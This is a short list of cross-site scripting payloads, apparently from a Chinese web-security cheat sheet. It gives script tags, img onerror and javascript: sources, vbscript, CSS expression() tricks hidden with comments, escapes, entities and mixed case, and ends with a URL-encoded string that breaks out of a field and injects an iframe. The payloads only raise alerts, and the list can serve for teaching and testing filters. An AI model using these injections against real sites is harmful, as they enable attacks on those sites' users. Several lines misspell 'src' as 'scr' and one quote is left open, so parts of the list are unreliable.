<script>alert("跨站")</script> (most commonly used)
<img scr=javascript:alert("跨站")></img>
<img scr="javascript: alert(/跨站/)></img>
<img scr="javas????cript:alert(/跨站/)" width=150></img> (the gap is whitespace produced with the Tab key)
<img scr="#" onerror=alert(/跨站/)></img>
<img scr="#" style="xss:expression(alert(/xss/));"></img>
<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ denotes a comment)
<img src=vbscript:msgbox ("xss")></img>
<style> input {left:expression (alert('xss'))}</style>
<div style={left:expression (alert('xss'))}></div>
<div style={left:exp/* */ression (alert('xss'))}></div>
<div style={left:\0065\0078ression (alert('xss'))}></div>
HTML entity: <div style={left:&#x0065;xpression (alert('xss'))}></div>
Unicode: <div style="{left:expRessioN (alert('xss'))}">
"]}%3Cscript%3Ealert('我又来啦!.')%3C/script%3E{[&item="]<iframe%20src=WWW.BAIDU.COM%20width=400%20height=600></iframe>["